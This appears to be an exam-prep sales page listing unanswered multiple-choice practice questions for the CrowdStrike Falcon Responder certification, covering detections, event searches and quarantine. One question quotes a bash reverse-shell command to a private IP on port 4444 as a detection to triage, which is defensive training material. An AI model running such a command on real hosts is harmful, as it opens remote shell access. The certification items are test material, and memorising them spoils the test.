Summer Certification Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

CCFR-201b CrowdStrike Certified Falcon Responder Questions and Answers

Questions 4

What does pivoting to an Event Search from a detection do?

Options:

A.

It gives you the ability to search for similar events on other endpoints quickly

B.

It takes you to the raw Insight event data and provides you with a number of Event Actions

C.

It takes you to a Process Timeline for that detection so you can see all related events

D.

It allows you to input an event type, such as DNS Request or ASEP write, and search for those events within the detection

Buy Now
Questions 5

Which statement is TRUE regarding the " Bulk Domains " search?

Options:

A.

It will show a list of computers and process that performed a lookup of any of the domains in your search

B.

The " Bulk Domains " search will allow you to blocklist your queried domains

C.

The " Bulk Domains " search will show IP address and port information for any associated connections D. You should only pivot to the " Bulk Domains " search tool after completing an investigation

Buy Now
Questions 6

An executive asks for a definition of ' CrowdScore ' . Which of the following sentences best describes what CrowdScore is?

Options:

A.

It is a ranking system that compares your organization’s security to other companies.

B.

It is a metric designed to show an organization ' s threat level on a continual basis by aggregating related detections.

C.

It is the total number of detections that have been resolved within the last 24 hours.

D.

It is a measure of the total processing power being used by the Falcon sensors globally.

Buy Now
Questions 7

The Activity Dashboard is a core feature for security teams. What is the primary purpose of this dashboard?

Options:

A.

To manage the installation and update of Falcon sensors.

B.

To provide a summary of the current threat state and active detections in the environment.

C.

To view the raw telemetry of every event happening on the network.

D.

To audit the changes made by other Falcon administrators.

Buy Now
Questions 8

After pivoting to an event search from a detection, you locate the ProcessRollup2 event. Which two field values are you required to obtain to perform a Process Timeline search so you can determine what the process was doing?

Options:

A.

SHA256 and TargetProcessld_decimal

B.

SHA256 and ParentProcessld_decimal

C.

aid and ParentProcessld_decimal

D.

aid and TargetProcessld_decimal

Buy Now
Questions 9

When an analyst downloads a quarantined file from the Falcon UI for offline analysis, what is the specific file format and the required password for extraction?

Options:

A.

The file is downloaded as a 7-zip archive and requires the password ' infected ' for extraction.

B.

The file is downloaded in its raw binary format without any encryption or compression.

C.

The file is downloaded as a standard ZIP archive but does not require a password to open.

D.

The file is downloaded as an encrypted .exe that can only be opened by a CrowdStrike sensor.

Buy Now
Questions 10

Analyze the following process lineage observed during a detection triage on a Windows 10 workstation:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe.

Based on the fact that the suspicious process originated from the user ' s desktop shell environment (explorer.exe), what is the most likely entry vector for this attack?

Options:

A.

Remote exploitation of a system service

B.

User execution via a Phishing email or drive-by download

C.

Malicious persistence via a WMI event subscription

D.

Credential theft through a compromised Domain Controller

Buy Now
Questions 11

The primary purpose for running a Hash Search is to:

Options:

A.

determine any network connections

B.

review the processes involved with a detection

C.

determine the origin of the detection

D.

review information surrounding a hash ' s related activity

Buy Now
Questions 12

In various telemetry events like ' FileWrite ' or ' NetworkConnect ' , Falcon identifies the process that performed the action. Which field will always identify this " acting " process?

Options:

A.

ContextProcessId_decimal

B.

TargetProcessId_decimal

C.

ParentProcessId_decimal

D.

OwnerProcessId_decimal

Buy Now
Questions 13

What is the difference between a Host Search and a Host Timeline?

Options:

A.

Results from a Host Search return information in an organized view by type, while a Host Timeline returns a view of all events recorded by the sensor

B.

A Host Timeline only includes process execution events and user account activity

C.

Results from a Host Timeline include process executions and related events organized by data type. A Host Search returns a temporal view of all events for the given host

D.

There is no difference - Host Search and Host Timeline are different names for the same search page

Buy Now
Questions 14

Which of the following sentences best describes the primary use of ' Retrospective Analysis ' ?

Options:

A.

Identifying future threats using predictive AI models.

B.

Applying an investigative approach across historical timed buckets of telemetry to find past activity.

C.

Terminating a malicious process as it starts to execute.

D.

Recovering files that were encrypted by a ransomware attack.

Buy Now
Questions 15

A responder decides to set a specific Custom IOA to the ' Monitor ' action. Which of the following sentences best describes the technical result of this choice?

Options:

A.

The sensor will block the activity and alert the user with a pop-up.

B.

The sensor will create detections with ' Informational ' severity but will not block the activity.

C.

The sensor will log the activity in the audit logs but will not generate a detection.

D.

The sensor will automatically isolate the host from the network.

Buy Now
Questions 16

An adversary is attempting to disable security features by modifying the system registry. Which of the following native Windows processes is specifically designed to create, modify, and delete Registry keys via the command line?

Options:

A.

reg.exe

B.

taskmgr.exe

C.

lsass.exe

D.

svchost.exe

Buy Now
Questions 17

When examining a raw DNS request event, you see a field called ContextProcessld_decimal. What is the purpose of that field?

Options:

A.

It contains the TargetProcessld_decimal value for other related events

B.

It contains an internal value not useful for an investigation

C.

It contains the ContextProcessld_decimal value for the parent process that made the DNS request

D.

It contains the TargetProcessld_decimal value for the process that made the DNS request

Buy Now
Questions 18

How are processes on the same plane ordered (bottom ' VMTOOLSD.EXE ' to top CMD.EXE ' )?

Options:

A.

Process ID (Descending, highest on bottom)

B.

Time started (Descending, most recent on bottom)

C.

Time started (Ascending, most recent on top)

D.

Process ID (Ascending, highest on top)

Buy Now
Questions 19

When reviewing CrowdScore Incidents, which of the following statements is INCORRECT?

Options:

A.

Incidents aggregate related detections to reduce alert fatigue.

B.

Incidents are defined as inactive after 10 hours pass without any new related activity.

C.

A high CrowdScore indicates a higher likelihood of a sophisticated or widespread attack.

D.

CrowdScore is only visible to users with the ' Falcon Administrator ' role.

Buy Now
Questions 20

Falcon uses specific identifiers to track processes across the environment. Which of the following sentences best describes what the ' TargetProcessId_decimal ' raw data represents?

Options:

A.

The standard Process ID (PID) assigned by the Windows operating system.

B.

A sensor-assigned decimal number that is unique for each process across time and hosts.

C.

The memory address where the process’s executable is loaded.

D.

The total number of seconds the process has been running.

Buy Now
Questions 21

Refer to the image.

What does the arrowed line indicate?

Options:

A.

PowerShell spawned Notepad.exe, which injected a thread back to Excel.exe

B.

The thread injection was considered a Medium severity injection

C.

PowerShell spawned Notepad.exe, which injected a thread back to PowerShell

D.

Notepad.exe injected itself into Excel.exe

Buy Now
Questions 22

Administrators can define their own criteria for alerts. Which of the following is an example of a custom detection within the Falcon platform?

Options:

A.

Sensor-based Malware Detections

B.

Blacklisted Hashes

C.

Overwatch Managed Detections

D.

Behavioral IOA Detections

Buy Now
Questions 23

The Falcon sensor can automatically upload quarantined files to the CrowdStrike Cloud for further analysis. What is the maximum size allowed for a quarantined file to be uploaded?

Options:

A.

10MB

B.

32MB

C.

64MB

D.

128MB

Buy Now
Questions 24

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Buy Now
Questions 25

From the Detections page, how can you view ' in-progress ' detections assigned to Falcon Analyst Alex?

Options:

A.

Filter on ' Analyst: Alex '

B.

Alex does not have the correct role permissions as a Falcon Analyst to be assigned detections

C.

Filter on ' Hostname: Alex ' and ' Status: In-Progress '

D.

Filter on ' Status: In-Progress ' and ' Assigned-to: Alex*

Buy Now
Questions 26

Which of the following is NOT a valid event type?

Options:

A.

StartofProcess

B.

EndofProcess

C.

ProcessRollup2

D.

DnsRequest

Buy Now
Questions 27

The Process Activity View provides a rows-and-columns style view of the events generated in a detection. Why might this be helpful?

Options:

A.

The Process Activity View creates a consolidated view of all detection events for that process that can be exported for further analysis

B.

The Process Activity View will show the Detection time of the earliest recorded activity which might indicate first affected machine

C.

The Process Activity View only creates a summary of Dynamic Link Libraries (DLLs) loaded by a process

D.

The Process Activity View creates a count of event types only, which can be useful when scoping the event

Buy Now
Questions 28

What is an advantage of using the IP Search tool?

Options:

A.

IP searches provide manufacture and timezone data that can not be accessed anywhere else

B.

IP searches allow for multiple comma separated IPv6 addresses as input

C.

IP searches offer shortcuts to launch response actions and network containment on target hosts

D.

IP searches provide host, process, and organizational unit data without the need to write a query

Buy Now
Questions 29

An analyst needs to perform local sandbox analysis on a malicious file. When they download a quarantined file from the Falcon UI, what is the file format and the default password?

Options:

A.

.zip, password: crowdstrike

B.

.7-zip, password: infected

C.

.rar, password: malware

D.

.exe, no password

Buy Now
Questions 30

You are tasked with remediating adware for a host using a custom script via Real Time Response (RTR). When running the script, you get an error that the script is timing out.

How can you resolve this issue?

Options:

A.

Set the -timeout argument to off

B.

Set the -timeout argument to a longer period

C.

Rerun the script

D.

Change the timeout policy in the console settings

Buy Now
Questions 31

You are reviewing the raw data in an event search from a detection tree. You find a FileOpenlnfo event and want to find out if any other files were opened by the responsible process. Which two field values do you need from this event to perform a Process Timeline search?

Options:

A.

ParentProcessld_decimal and aid

B.

ResponsibleProcessld_decimal and aid

C.

ContextProcessld_decimal and aid

D.

TargetProcessld_decimal and aid

Buy Now
Questions 32

After running an Event Search, you can select many Event Actions depending on your results. Which of the following is NOT an option for any Event Action?

Options:

A.

Draw Process Explorer

B.

Show a +/- 10-minute window of events

C.

Show a Process Timeline for the responsible process

D.

Show Associated Event Data (from TargetProcessld_decimal or ContextProcessld_decimal)

Buy Now
Questions 33

By default, when a file is quarantined by the Falcon sensor to prevent execution, how many days does that file remain on the host ' s local disk?

Options:

A.

7 days

B.

14 days

C.

30 days

D.

90 days

Buy Now
Questions 34

Multiple detections with the process schtasks.exe begin to alert in the UI. The process executes the following command line on several unique hosts:

schtasks.exe /Query /TN " Qljsscdqr "

What is the most efficient way to identify which hosts are executing this scheduled task?

Options:

A.

Filter detections by command line and sort by ' Host:A to Z '

B.

Filter detections by command line and group by triggering file

C.

Filter detections by the triggering file and sort by ' Host:A to Z '

D.

Filter detections by command line and group by host

Buy Now
Questions 35

When an analyst is trying to pinpoint the exact moment an endpoint came online after being shut down for the weekend, which timeline view is the best to use?

Options:

A.

Process Timeline

B.

Host Timeline

C.

User Timeline

D.

Network Timeline

Buy Now
Questions 36

Refer to the image.

You are using Advanced Event Search to find the event record for a suspicious network connection.

Using the Event List Interactions button for the event, indicated by the arrow in the image above, which option will show all contextual event data around the process execution being investigated?

Options:

A.

Show Responsible Process Data

B.

Inspect

C.

Show +/- 10-minute windows of events

D.

Investigate Host

Buy Now
Questions 37

What do IOA exclusions help you achieve?

Options:

A.

Reduce false positives based on Next-Gen Antivirus settings in the Prevention Policy

B.

Reduce false positives of behavioral detections from IOA based detections only

C.

Reduce false positives of behavioral detections from IOA based detections based on a file hash

D.

Reduce false positives of behavioral detections from Custom IOA and OverWatch detections only

Buy Now
Questions 38

When you configure and apply an IOA exclusion, what impact does it have on the host and what you see in the console?

Options:

A.

The process specified is not sent to the Falcon Sandbox for analysis

B.

The associated detection will be suppressed and the associated process would have been allowed to run

C.

The sensor will stop sending events from the process specified in the regex pattern

D.

The associated IOA will still generate a detection but the associated process would have been allowed to run

Buy Now
Questions 39

You are responding to a cybersecurity incident and observe several outbound network connections from host Bob-Desktop. Upon review, you determine this to be a result of a Threat Actor ' s attempt to exfiltrate data.

What action should you take to stop the exfiltration using the Falcon Platform?

Options:

A.

Use the Falcon console to network contain Bob-Desktop

B.

Access Bob-Desktop via RTR and run the contain command

C.

Find the IP address associated with the exfiltration and block it by creating an IOA

D.

Find the IP address associated with the exfiltration and block it by creating an IOC

Buy Now
Questions 40

You are notified by a third-party that a program may have redirected traffic to a malicious domain. Which Falcon page will assist you in searching for any domain request information related to this notice?

Options:

A.

Falcon X

B.

Investigate

C.

Discover

D.

Spotlight

Buy Now
Questions 41

When navigating the ' Custom IOA ' creation wizard, a user must select a rule type. Which of the following is NOT a valid IOA rule type available for selection?

Options:

A.

Process Creation

B.

File Creation

C.

Domain Name

D.

Scheduled Task

Buy Now
Questions 42

To track the relationship between a parent and its child, Falcon uses specific ID fields. What raw data is used as the ' ParentProcessId_decimal ' when a process spawns a child process?

Options:

A.

The Operating System PID of the parent.

B.

The TargetProcessId_decimal of the parent process.

C.

The ContextProcessId_decimal of the system.

D.

The RootProcessId_decimal of the entire tree.

Buy Now
Questions 43

An analyst wants to see the raw events behind a specific detection. Which icon in the UI allows them to pivot directly to an event search?

Options:

A.

Shield icon

B.

Spyglass icon

C.

Trash can icon

D.

Gear icon

Buy Now
Questions 44

To understand how a threat moved on a system, a responder must know the role of common processes. Which of the following statements best describes the standard functionality of explorer.exe?

Options:

A.

It is a system process responsible for the Local Security Authority subsystem.

B.

It is the primary process responsible for the File Explorer UI and the user ' s desktop environment.

C.

It is the Windows Command Processor used for executing batch files.

D.

It is the service control manager that handles the starting of background tasks.

Buy Now
Questions 45

Which of the following statements about the ' Hash Search ' (Single Search) is TRUE?

Options:

A.

It can search for both files and registry keys simultaneously.

B.

It identifies the geographical location of the file ' s creator.

C.

The ' Hash Written History ' section is only available for SHA256 hashes.

D.

It is primarily used to isolate a host from the network.

Buy Now
Questions 46

A responder needs to view a high-level overview of the environment ' s security posture. Where can they find the ' Activity Dashboard ' ?

Options:

A.

Investigate > Activity Dashboard

B.

Endpoint Security > Monitor > Activity Dashboard

C.

Configuration > General > Activity Dashboard

D.

Support > Analytics > Activity Dashboard

Buy Now
Questions 47

When reviewing a Host Timeline, which of the following filters is available?

Options:

A.

Severity

B.

Event Types

C.

User Name

D.

Detection ID

Buy Now
Questions 48

Data retention is a key factor in retrospective hunting. How long will " Detection Related Events " be retained in the Falcon environment?

Options:

A.

30 days

B.

60 days

C.

90 days

D.

1 year

Buy Now
Questions 49

What happens when you open the full detection details?

Options:

A.

Theprocess explorer opens and the detection is removed from the console

B.

The process explorer opens and you ' re able to view the processes and process relationships

C.

The process explorer opens and the detection copies to the clipboard

D.

The process explorer opens and the Event Search query is run for the detection

Buy Now
Questions 50

In the " Full Detection Details " , which view will provide an exportable text listing of events like DNS requests. Registry Operations, and Network Operations?

Options:

A.

Thedata is unable to be exported

B.

View as Process Tree

C.

View as Process Timeline

D.

View as Process Activity

Buy Now
Questions 51

Following a detection involving a suspected ransomware binary, the Falcon sensor automatically takes a prevention action to prevent the file from executing. An analyst needs to retrieve this file for local sandbox analysis. Considering the default configuration, for how many days will this file remain stored in the encrypted quarantine folder on the local endpoint?

Options:

A.

7 days

B.

14 days

C.

30 days

D.

90 days

Buy Now
Questions 52

While reviewing the ' Detection Method ' field for a high-severity alert, a responder sees the label ' Post-Exploit ' . This terminology is used by CrowdStrike to identify a specific:

Options:

A.

Falcon Detection Method

B.

MITRE Tactic

C.

Indicator of Attack (IOA)

D.

Prevention Policy Level

Buy Now
Questions 53

When reviewing open detections, what method should be used to identify the most relevant related information in the environment?

Options:

A.

Host Management grouping by host, organizational unit, or prevention policy

B.

Grouping detections by command line, host, hash, or triggering file

C.

Review the Detection Resolutions dashboard

D.

Sort detections by Time: Oldest to Newest

Buy Now
Questions 54

When performing a ' Hash Search ' , which of the following is NOT a filter available for use?

Options:

A.

SHA256

B.

MD5

C.

File Type

D.

Filename

Buy Now
Questions 55

The MITRE-Based Falcon Detections Framework is a core component of the Falcon UI. What is the primary operational advantage provided by this framework to a Tier 1 responder?

Options:

A.

It allows for the automated decryption of files affected by ransomware.

B.

It provides a standardized view of the attack lifecycle to help understand adversary behavior.

C.

It enables the sensor to block kernel-level drivers from unknown publishers.

D.

It provides a real-time count of the total number of files on the endpoint.

Buy Now
Questions 56

What information is contained within a Process Timeline?

Options:

A.

All cloudable process-related events within a given timeframe

B.

All cloudable events for a specific host

C.

Only detection process-related events within a given timeframe

D.

A view of activities on Mac or Linux hosts

Buy Now
Questions 57

What are Event Actions?

Options:

A.

Automated searches that can be used to pivot between related events and searches

B.

Pivotable hyperlinks available in a Host Search

C.

Custom event data queries bookmarked by the currently signed in Falcon user

D.

Raw Falcon event data

Buy Now
Questions 58

What happens when a hash is allowlisted?

Options:

A.

Execution is prevented, but detection alerts are suppressed

B.

Execution is allowed on all hosts, including all other Falcon customers

C.

The hash is submitted for approval to be allowed to execute once confirmed by Falcon specialists

D.

Execution is allowed on all hosts that fall under the organization ' s CID

Buy Now
Questions 59

In the context of raw event searching, the term ' ProcessRollup2 ' refers to a value within which field?

Options:

A.

event_type

B.

event_simpleName

C.

action_id

D.

process_status

Buy Now
Questions 60

While quarantined files stay on the local host for 30 days by default, how many days does a quarantined file remain stored in the CrowdStrike Cloud?

Options:

A.

30 days

B.

60 days

C.

90 days

D.

180 days

Buy Now
Questions 61

CrowdStrike provides ' Overwatch Best Practices ' for triaging alerts. According to these guidelines, what is the next step a responder should take immediately after the ' Understand the detection ' step?

Options:

A.

Isolate the host from the network.

B.

Review the process tree to understand the origin of the activity.

C.

Perform an OSINT search for the suspicious hash.

D.

Resolve the detection as a True Positive.

Buy Now
Questions 62

Responders must understand the limitations and capabilities of custom rules. Which of the following statements about custom IOAs is FALSE?

Options:

A.

They can be used to monitor or block specific command-line strings.

B.

A Custom IOA rule group can only be applied to one single prevention policy.

C.

They can generate ' Informational ' detections if set to the ' Monitor ' action.

D.

They allow for pattern matching using wildcards or specific strings.

Buy Now

CCFR |

Exam Code: CCFR-201b
Exam Name: CrowdStrike Certified Falcon Responder
Last Update: Jul 21, 2026
Questions: 181
CCFR-201b pdf

CCFR-201b PDF

$25.5  $84.99
CCFR-201b Engine

CCFR-201b Testing Engine

$30  $99.99
CCFR-201b PDF + Engine

CCFR-201b PDF + Testing Engine

$40.5  $134.99